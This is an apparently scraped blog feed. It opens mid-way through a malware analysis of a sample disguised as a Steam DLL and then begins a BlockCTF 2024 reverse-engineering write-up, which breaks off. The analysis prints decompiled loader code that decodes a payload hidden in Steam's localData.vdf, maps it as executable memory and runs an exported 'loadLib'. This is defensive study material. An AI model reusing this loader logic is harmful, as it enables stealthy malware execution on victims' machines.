(!GetUserNameA(Buffer, &amp;pcbBuffer)</span><br><span class="line">            || (wsprintfA(FileName, <span class="string">&quot;C:\\Users\\%s\\AppData\\Local&quot;</span>, Buffer), GetFileAttributesA(FileName) == -<span class="number">1</span>))</span><br><span class="line">        &#123;</span><br><span class="line">            ppszPath = <span class="number">0</span>;</span><br><span class="line">            <span class="keyword">if</span> (SHGetKnownFolderPath(&amp;rfid, 0x8000u, <span class="number">0</span>, &amp;ppszPath))</span><br><span class="line">            &#123;</span><br><span class="line">                BOOL v4 = SHGetSpecialFolderPathA(<span class="number">0</span>, FileName, <span class="number">28</span>, <span class="number">0</span>);</span><br><span class="line">                v3 = FileName;</span><br><span class="line">                <span class="keyword">if</span> (!v4)</span><br><span class="line">                    v3 = (char *)&amp;unk_10018CB6;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                // 处理已知的文件夹路径</span><br><span class="line">                sub_1000A2F7(<span class="number">0</span>, FileName, 0x104u, ppszPath, 0x104u);</span><br><span class="line">                CoTaskMemFree(ppszPath);</span><br><span class="line">                v3 = FileName;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            v3 = FileName;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 设置文件路径</span><br><span class="line">    wsprintfA(v93, <span class="string">&quot;%s\\Steam\\localData.vdf&quot;</span>, v3);</span><br><span class="line"></span><br><span class="line">    // 打开文件</span><br><span class="line">    HANDLE v5 = CreateFileA(v93, <span class="number">0x80000000</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">128</span>, <span class="number">0</span>);</span><br><span class="line">    void *v6 = v5;</span><br><span class="line">    <span class="keyword">if</span> (v5 == (HANDLE)-<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    // 获取文件大小</span><br><span class="line">    SIZE_T v7 = GetFileSize(v5, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    // 分配内存</span><br><span class="line">    char *v8 = (char *)VirtualAlloc(<span class="number">0</span>, v7, <span class="number">12288</span>, <span class="number">4</span>);</span><br><span class="line">    <span class="keyword">if</span> (!v8)</span><br><span class="line">    &#123;</span><br><span class="line">        CloseHandle(v6);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 读取文件内容</span><br><span class="line">    <span class="keyword">if</span> (!ReadFile(v6, v8, v7, (LPDWORD)&amp;v90, <span class="number">0</span>) || v90 != v7)</span><br><span class="line">    &#123;</span><br><span class="line">        CloseHandle(v6);</span><br><span class="line">        goto LABEL_100;</span><br><span class="line">    &#125;</span><br><span class="line">    CloseHandle(v6);</span><br><span class="line"></span><br><span class="line">    // 分配另一块内存</span><br><span class="line">    ppszPath = (PWSTR)(<span class="number">5</span> * v7);</span><br><span class="line">    pcbBuffer = (<span class="built_in">int</span>)VirtualAlloc(<span class="number">0</span>, <span class="number">5</span> * v7, <span class="number">12288</span>, <span class="number">4</span>);</span><br><span class="line">    <span class="keyword">if</span> (!pcbBuffer)</span><br><span class="line">    &#123;</span><br><span class="line">    LABEL_100:</span><br><span class="line">        VirtualFree(v8, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 文件内容的处理逻辑</span><br><span class="line">    unsigned <span class="built_in">int</span> v10 = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (v7)</span><br><span class="line">    &#123;</span><br><span class="line">        // 执行某些数据处理操作</span><br><span class="line">        <span class="keyword">if</span> (v7 &lt; <span class="number">8</span>)</span><br><span class="line">            goto LABEL_104;</span><br><span class="line">        <span class="keyword">if</span> (v7 &lt; <span class="number">0x40</span>)</span><br><span class="line">            goto LABEL_105;</span><br><span class="line">        __m128 *v11 = (__m128 *)(v8 + <span class="number">32</span>);</span><br><span class="line">        unsigned <span class="built_in">int</span> v12 = v7 &amp; <span class="number">0x3F</span>;</span><br><span class="line">        do</span><br><span class="line">        &#123;</span><br><span class="line">            __m128 v13 = v11[-<span class="number">2</span>];</span><br><span class="line">            v10 += <span class="number">64</span>;</span><br><span class="line">            v11 += <span class="number">4</span>;</span><br><span class="line">            v11[-<span class="number">6</span>] = _mm_andnot_ps(v13, (__m128)xmmword_1001D520);</span><br><span class="line">            v11[-<span class="number">5</span>] = _mm_andnot_ps(v11[-<span class="number">5</span>], (__m128)xmmword_1001D520);</span><br><span class="line">            v11[-<span class="number">4</span>] = _mm_andnot_ps(v11[-<span class="number">4</span>], (__m128)xmmword_1001D520);</span><br><span class="line">            v11[-<span class="number">3</span>] = _mm_andnot_ps(v11[-<span class="number">3</span>], (__m128)xmmword_1001D520);</span><br><span class="line">        &#125; <span class="keyword">while</span> (v10 &lt; v7 - v12);</span><br><span class="line">        <span class="keyword">if</span> (v12 &gt;= <span class="number">8</span>)</span><br><span class="line">        &#123;</span><br><span class="line">        LABEL_105:</span><br><span class="line">            do</span><br><span class="line">            &#123;</span><br><span class="line">                *(_QWORD *)&amp;v8[v10] = _mm_andnot_ps(</span><br><span class="line">                    (__m128)_mm_loadl_epi64((const __m128i *)&amp;v8[v10]),</span><br><span class="line">                    (__m128)xmmword_1001D520)</span><br><span class="line">                    .m128_u64[<span class="number">0</span>];</span><br><span class="line">                v10 += <span class="number">8</span>;</span><br><span class="line">            &#125; <span class="keyword">while</span> (v10 &lt; (v7 &amp; <span class="number">0xFFFFFFF8</span>));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (v10 &lt; v7)</span><br><span class="line">        &#123;</span><br><span class="line">        LABEL_104:</span><br><span class="line">            do</span><br><span class="line">            &#123;</span><br><span class="line">                v8[v10] = ~v8[v10];</span><br><span class="line">                ++v10;</span><br><span class="line">            &#125; <span class="keyword">while</span> (v10 &lt; v7);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 分配用于保存处理结果的内存</span><br><span class="line">    v62 = (char *)pcbBuffer;</span><br><span class="line">    <span class="keyword">if</span> (ppszPath)</span><br><span class="line">    &#123;</span><br><span class="line">        v14 = (<span class="built_in">int</span>)ppszPath;</span><br><span class="line">        ppszPath = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        v14 = <span class="number">1</span>;</span><br><span class="line">        v62 = &amp;v89;</span><br><span class="line">    &#125;</span><br><span class="line">    v79 = v8;</span><br><span class="line">    v80 = <span class="number">0</span>;</span><br><span class="line">    v85 = <span class="number">0</span>;</span><br><span class="line">    v86 = <span class="number">0</span>;</span><br><span class="line">    v87 = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    // 调用函数处理数据</span><br><span class="line">    <span class="keyword">if</span> (sub_10003740(v59, v60))</span><br><span class="line">        goto LABEL_98;</span><br><span class="line"></span><br><span class="line">    v81 = v62;</span><br><span class="line">    v15 = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>;; v15 = i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (!v15)</span><br><span class="line">        &#123;</span><br><span class="line">            i = v14;</span><br><span class="line">            v14 = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (!v80)</span><br><span class="line">        &#123;</span><br><span class="line">            v80 = v7;</span><br><span class="line">            v7 = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        v16 = sub_10003980(&amp;v79, <span class="number">0</span>);</span><br><span class="line">        v73 = v16;</span><br><span class="line">        <span class="keyword">if</span> (v16)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (v62 != &amp;v89)</span><br><span class="line">        ppszPath = v83;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (v85)</span><br><span class="line">    &#123;</span><br><span class="line">        // 调用回调函数</span><br><span class="line">        v17 = v86;</span><br><span class="line">        <span class="keyword">if</span> (v86)</span><br><span class="line">        &#123;</span><br><span class="line">            v18 = v84;</span><br><span class="line">            <span class="keyword">if</span> (v84)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (*(char ***)v84 == &amp;v79 &amp;&amp; (unsigned <span class="built_in">int</span>)(*(_DWORD *)(v84 + <span class="number">4</span>) - <span class="number">16180</span>) &lt;= <span class="number">0x1F</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">if</span> (*(_DWORD *)(v84 + <span class="number">56</span>))</span><br><span class="line">                    &#123;</span><br><span class="line">                        v86(v87, *(_DWORD *)(v84 + <span class="number">56</span>));</span><br><span class="line">                        v17 = v86;</span><br><span class="line">                        v18 = v84;</span><br><span class="line">                    &#125;</span><br><span class="line">                    v17(v87, v18);</span><br><span class="line">                    v16 = v73;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 如果处理不成功，释放内存并返回</span><br><span class="line">    <span class="keyword">if</span> (v16 != <span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">    LABEL_98:</span><br><span class="line">        VirtualFree(v8, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line">        VirtualFree((LPVOID)pcbBuffer, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 释放内存</span><br><span class="line">    VirtualFree(v8, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line"></span><br><span class="line">    // 进一步处理内存内容，检查文件头和其他信息</span><br><span class="line">    v19 = (_BYTE *)pcbBuffer;</span><br><span class="line">    <span class="keyword">if</span> ((unsigned <span class="built_in">int</span>)ppszPath &lt; <span class="number">0x40</span>)</span><br><span class="line">        goto LABEL_96;</span><br><span class="line">    <span class="keyword">if</span> (*(_WORD *)pcbBuffer != <span class="number">23117</span>)</span><br><span class="line">        goto LABEL_96;</span><br><span class="line">    v20 = *(_DWORD *)(pcbBuffer + <span class="number">60</span>);</span><br><span class="line">    v74 = v20;</span><br><span class="line">    <span class="keyword">if</span> ((unsigned <span class="built_in">int</span>)ppszPath &lt; v20 + <span class="number">248</span>)</span><br><span class="line">        goto LABEL_96;</span><br><span class="line">    v21 = *(_DWORD *)(v20 + pcbBuffer) == <span class="number">17744</span>;</span><br><span class="line">    v22 = (PWSTR)(v20 + pcbBuffer);</span><br><span class="line">    ppszPath = (PWSTR)(v20 + pcbBuffer);</span><br><span class="line"></span><br><span class="line">    // 分配新的内存，并复制部分内容</span><br><span class="line">    <span class="keyword">if</span> (v21 &amp;&amp; (v23 = (_BYTE *)VirtualAlloc(<span class="number">0</span>, *((_DWORD *)v22 + <span class="number">20</span>), <span class="number">12288</span>, <span class="number">64</span>), v24 = v23, (v70 = v23) != <span class="number">0</span>))</span><br><span class="line">    &#123;</span><br><span class="line">        v25 = *((_DWORD *)v22 + <span class="number">21</span>);</span><br><span class="line">        <span class="keyword">if</span> (v25)</span><br><span class="line">        &#123;</span><br><span class="line">            v26 = v23;</span><br><span class="line">            v27 = v19 - v23;</span><br><span class="line">            do</span><br><span class="line">            &#123;</span><br><span class="line">                v28 = v26[v27];</span><br><span class="line">                *v26++ = v28;</span><br><span class="line">                --v25;</span><br><span class="line">            &#125; <span class="keyword">while</span> (v25);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        // 更多的数据复制和处理逻辑...</span><br><span class="line">        // ...</span><br><span class="line"></span><br><span class="line">        // 检查和加载函数指针</span><br><span class="line">        <span class="keyword">if</span> (*((_DWORD *)v22 + <span class="number">33</span>))</span><br><span class="line">        &#123;</span><br><span class="line">            v39 = &amp;v24[*((_DWORD *)v22 + <span class="number">32</span>)];</span><br><span class="line">            v63 = v39;</span><br><span class="line">            <span class="keyword">if</span> (*((_DWORD *)v39 + <span class="number">3</span>))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    v67 = GetModuleHandleA(&amp;v24[*((_DWORD *)v39 + <span class="number">3</span>)]);</span><br><span class="line">                    <span class="keyword">if</span> (!v67)</span><br><span class="line">                        goto LABEL_85;</span><br><span class="line">                    v40 = *(_DWORD *)v39;</span><br><span class="line">                    v41 = *((_DWORD *)v39 + <span class="number">4</span>);</span><br><span class="line">                    v42 = &amp;v24[*(_DWORD *)v39];</span><br><span class="line">                    v43 = (FARPROC *)&amp;v24[v41];</span><br><span class="line">                    <span class="keyword">if</span> (v42)</span><br><span class="line">                        v41 = v40;</span><br><span class="line">                    v44 = (<span class="built_in">int</span> *)&amp;v24[v41];</span><br><span class="line">                    v45 = *v44 &lt; <span class="number">0</span>;</span><br><span class="line">                    <span class="keyword">if</span> (*v44)</span><br><span class="line">                    &#123;</span><br><span class="line">                        v46 = *v44;</span><br><span class="line">                        do</span><br><span class="line">                        &#123;</span><br><span class="line">                            v47 = v45 ? (const CHAR *)(unsigned __int16)v46 : &amp;v24[v46 + <span class="number">2</span>];</span><br><span class="line">                            v48 = GetProcAddress(v67, v47);</span><br><span class="line">                            *v43 = v48;</span><br><span class="line">                            <span class="keyword">if</span> (!v48)</span><br><span class="line">                                goto LABEL_85;</span><br><span class="line">                            v49 = v44[<span class="number">1</span>];</span><br><span class="line">                            ++v44;</span><br><span class="line">                            ++v43;</span><br><span class="line">                            v46 = v49;</span><br><span class="line">                            v45 = v49 &lt; <span class="number">0</span>;</span><br><span class="line">                        &#125; <span class="keyword">while</span> (v49);</span><br><span class="line">                    &#125;</span><br><span class="line">                    v39 = v63 + <span class="number">20</span>;</span><br><span class="line">                    v63 = v39;</span><br><span class="line">                    <span class="keyword">if</span> (!*((_DWORD *)v39 + <span class="number">3</span>))</span><br><span class="line">                    &#123;</span><br><span class="line">                        v22 = ppszPath;</span><br><span class="line">                        <span class="keyword">break</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        // 调用加载的函数</span><br><span class="line">        v50 = *((_DWORD *)v22 + <span class="number">10</span>);</span><br><span class="line">        <span class="keyword">if</span> (v50 &amp;&amp; !((<span class="built_in">int</span> (__stdcall *)(CHAR *, <span class="built_in">int</span>, _DWORD))&amp;v24[v50])(v24, <span class="number">1</span>, <span class="number">0</span>))</span><br><span class="line">        &#123;</span><br><span class="line">        LABEL_85:</span><br><span class="line">            VirtualFree(v24, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line">            VirtualFree((LPVOID)pcbBuffer, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        VirtualFree((LPVOID)pcbBuffer, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line"></span><br><span class="line">        // 处理成功，执行回调</span><br><span class="line">        v51 = *((_DWORD *)v24 + <span class="number">15</span>);</span><br><span class="line">        <span class="keyword">if</span> (*(_DWORD *)&amp;v24[v51 + <span class="number">124</span>])</span><br><span class="line">        &#123;</span><br><span class="line">            v52 = <span class="number">0</span>;</span><br><span class="line">            v53 = &amp;v24[*(_DWORD *)&amp;v24[v51 + <span class="number">120</span>]];</span><br><span class="line">            v75 = &amp;v24[*((_DWORD *)v53 + <span class="number">9</span>)];</span><br><span class="line">            v54 = &amp;v24[*((_DWORD *)v53 + <span class="number">8</span>)];</span><br><span class="line">            v71 = &amp;v24[*((_DWORD *)v53 + <span class="number">7</span>)];</span><br><span class="line">            v76 = *((_DWORD *)v53 + <span class="number">6</span>);</span><br><span class="line">            <span class="keyword">if</span> (v76)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    v55 = <span class="string">&quot;loadLib&quot;</span>;</span><br><span class="line">                    v56 = &amp;v24[*(_DWORD *)&amp;v54[<span class="number">4</span> * v52]];</span><br><span class="line">                    v57 = <span class="number">108</span>;</span><br><span class="line">                    do</span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="keyword">if</span> (v57 != *v56)</span><br><span class="line">                            <span class="keyword">break</span>;</span><br><span class="line">                        v57 = *++v55;</span><br><span class="line">                        ++v56;</span><br><span class="line">                    &#125; <span class="keyword">while</span> (v57);</span><br><span class="line">                    <span class="keyword">if</span> (*(unsigned __int8 *)v55 == (unsigned __int8)*v56)</span><br><span class="line">                        <span class="keyword">break</span>;</span><br><span class="line">                    <span class="keyword">if</span> (++v52 &gt;= v76)</span><br><span class="line">                        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                v58 = (void (*)(void))&amp;v24[*(_DWORD *)&amp;v71[<span class="number">4</span> * *(unsigned __int16 *)&amp;v75[<span class="number">2</span> * v52]]];</span><br><span class="line">                <span class="keyword">if</span> (v58)</span><br><span class="line">                &#123;</span><br><span class="line">                    v58();</span><br><span class="line">                    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">    LABEL_96:</span><br><span class="line">        VirtualFree(v19, <span class="number">0</span>, <span class="number">0x8000</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><h5 id="尝试解密localdate-vdf"><a href="#尝试解密localdate-vdf" class="headerlink" title="尝试解密localdate.vdf"></a>尝试解密localdate.vdf</h5><h4 id="一些功能函数"><a href="#一些功能函数" class="headerlink" title="一些功能函数"></a>一些功能函数</h4><p>或者我认为它模仿被替换的dll工作……</p><h5 id="将宽字符字符串转换为多字节字符串"><a href="#将宽字符字符串转换为多字节字符串" class="headerlink" title="将宽字符字符串转换为多字节字符串"></a>将宽字符字符串转换为多字节字符串</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">errno_t __cdecl _wcstombs_s_l(</span><br><span class="line">        size_t *PtNumOfCharConverted,</span><br><span class="line">        char *Dst,</span><br><span class="line">        size_t DstSizeInBytes,</span><br><span class="line">        const wchar_t *Src,</span><br><span class="line">        size_t MaxCountInBytes,</span><br><span class="line">        _locale_t Locale)</span><br><span class="line">&#123;</span><br><span class="line">    unsigned <span class="built_in">int</span> v6; // 存储实际转换的字节数</span><br><span class="line">    <span class="built_in">int</span> *v7; // 指向错误代码的指针</span><br><span class="line">    unsigned <span class="built_in">int</span> v9; // 转换结果</span><br><span class="line">    size_t v10; // 计算的字符串长度</span><br><span class="line">    errno_t v11; // 返回的错误代码</span><br><span class="line">    errno_t v12; // 临时错误代码</span><br><span class="line"></span><br><span class="line">    // 检查目标缓冲区是否为空</span><br><span class="line">    <span class="keyword">if</span> (Dst)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (DstSizeInBytes) // 如果目标大小非零</span><br><span class="line">            goto LABEL_3;</span><br><span class="line">LABEL_12:</span><br><span class="line">        *_errno() = <span class="number">22</span>; // 设置错误代码为EINVAL</span><br><span class="line">        _invalid_parameter_noinfo(); // 调用无参数的无效参数处理函数</span><br><span class="line">        <span class="keyword">return</span> <span class="number">22</span>; // 返回错误代码</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (DstSizeInBytes) // 如果目标大小非零</span><br><span class="line">        goto LABEL_12;</span><br><span class="line"></span><br><span class="line">LABEL_3:</span><br><span class="line">    <span class="keyword">if</span> (Dst)</span><br><span class="line">        *Dst = <span class="number">0</span>; // 设置目标缓冲区的第一个字符为空</span><br><span class="line">    <span class="keyword">if</span> (PtNumOfCharConverted)</span><br><span class="line">        *PtNumOfCharConverted = <span class="number">0</span>; // 将转换的字符数置为<span class="number">0</span></span><br><span class="line">    v6 = DstSizeInBytes; </span><br><span class="line">    <span class="keyword">if</span> (MaxCountInBytes &lt;= DstSizeInBytes)</span><br><span class="line">        v6 = MaxCountInBytes; // 确定要转换的字节数</span><br><span class="line">    <span class="keyword">if</span> (v6 &gt; <span class="number">0x7FFFFFFF</span>) // 如果转换的字节数大于最大允许值</span><br><span class="line">    &#123;</span><br><span class="line">        v7 = _errno(); // 获取错误代码指针</span><br><span class="line">        v12 = <span class="number">22</span>; // 设置错误代码为EINVAL</span><br><span class="line">LABEL_22:</span><br><span class="line">        *v7 = v12; // 设置错误代码</span><br><span class="line">        _invalid_parameter_noinfo(); // 调用无效参数处理函数</span><br><span class="line">        <span class="keyword">return</span> v12; // 返回错误代码</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 调用帮助函数进行转换</span><br><span class="line">    v9 = _wcstombs_l_helper(Dst, Src, v6, Locale);</span><br><span class="line">    <span class="keyword">if</span> (v9 == -<span class="number">1</span>) // 如果转换失败</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (Dst)</span><br><span class="line">            *Dst = <span class="number">0</span>; // 设置目标缓冲区为空</span><br><span class="line">        <span class="keyword">return</span> *_errno(); // 返回错误代码</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        v10 = v9 + <span class="number">1</span>; // 计算目标缓冲区所需的长度</span><br><span class="line">        <span class="keyword">if</span> (Dst)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (v10 &lt;= DstSizeInBytes) // 检查是否超出目标缓冲区大小</span><br><span class="line">            &#123;</span><br><span class="line">                v11 = <span class="number">0</span>; // 设置返回值为<span class="number">0</span>，表示成功</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (MaxCountInBytes != -<span class="number">1</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    *Dst = <span class="number">0</span>; // 设置目标缓冲区为空</span><br><span class="line">                    <span class="keyword">if</span> (DstSizeInBytes &lt;= v10) // 检查目标缓冲区是否足够</span><br><span class="line">                    &#123;</span><br><span class="line">                        v7 = _errno(); // 获取错误代码指针</span><br><span class="line">                        v12 = <span class="number">34</span>; // 设置错误代码为ERANGE</span><br><span class="line">                        goto LABEL_22; // 跳转到错误处理部分</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                v10 = DstSizeInBytes; // 将目标长度设置为目标缓冲区大小</span><br><span class="line">                v11 = <span class="number">80</span>; // 设置返回值为<span class="number">80</span>，表示缓冲区不足</span><br><span class="line">            &#125;</span><br><span class="line">            Dst[v10 - <span class="number">1</span>] = <span class="number">0</span>; // 确保目标缓冲区以空字符结尾</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            v11 = <span class="number">0</span>; // 如果目标为空，返回<span class="number">0</span>表示成功</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (PtNumOfCharConverted)</span><br><span class="line">            *PtNumOfCharConverted = v10; // 更新转换的字符数</span><br><span class="line">        <span class="keyword">return</span> v11; // 返回错误代码或成功标识</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;cuckoo搭建与-Steamwork1-简单分析报告&quot;&gt;&lt;a href=&quot;#cuckoo搭建与-Steamwork1-简单分析报告&quot; class=&quot;headerlink&quot; title=&quot;cuckoo搭建与[Steamwork1]简单分析报告&quot;&gt;&lt;/a&gt;cucko</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title>BlockCTF 2024 Reverse</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/21/blockctf2024/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/21/blockctf2024/</id>
    <published>2024-11-21T06:00:04.037Z</published>
    <updated>2024-12-16T03:43:38.920Z</updated>
    
    <content type="html"><![CDATA[<h1 id="BlockCTF-2024-Reverse"><a href="#BlockCTF-2024-Reverse" class="headerlink" title="BlockCTF 2024 Reverse"></a>BlockCTF 2024 Reverse</h1><h2 id="Nothin-But-Stringz"><a href="#Nothin-But-Stringz" class="headerlink" title="Nothin But Stringz"></a>Nothin But Stringz</h2><blockquote><p>Someone sent me this as a test of friendship, but I can’t make heads or tails out of it. Can you help?</p></blockquote><p>Download the <code>nothin_but_stringz.c.o</code></p><p>(刚学到，感恩yuro！)</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241116151909757.png" alt="image-20241116151909757"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241116151741826.png" alt="image-20241116151741826"></p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">nothin_but_stringz.c.o: <span class="title">LLVM</span> <span class="title">bitcode</span>, <span class="title">wrapper</span></span></span><br></pre></td></tr></table></figure><p>Judging by the file name, we <code>strings</code> the file:</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241116152044599.png" alt="image-20241116152044599"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">0$JY</span><br><span class="line">P$v`</span><br><span class="line">f$c0</span><br><span class="line">fLg0</span><br><span class="line">        r2H #</span><br><span class="line">(d&lt;12B</span><br><span class="line">SDK Versionwchar_sizePIC Leveluwtableframe-pointerApple clang version 15.0.0 (clang-1500.3.9.4)</span><br><span class="line">A00 )`</span><br><span class="line">.strflag.str.1mainprintf18.1.8arm64-apple-ios7.0.0nothin_but_stringz.c_main_printfL_.str_flagL_.str.1</span><br></pre></td></tr></table></figure><blockquote><p> Was not it. Doing some research online you can find to decompile the LLVM bitcode you need the <strong>llvm-dis</strong>. And then it would output a ll file:</p></blockquote><p>学个新东西：</p><blockquote><p><code>llvm-dis</code> 是 LLVM 工具链中的一个工具，用于将二进制格式的 LLVM IR（Intermediate Representation，中间表示）文件（即 <code>.bc</code> 文件，bitcode 文件）反汇编成人类可读的 LLVM IR 文本格式（即 <code>.ll</code> 文件）。</p></blockquote><p>将结果输出到标准输出：</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">llvm-dis nothin_but_stringz.c.o  -o -</span><br></pre></td></tr></table></figure><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 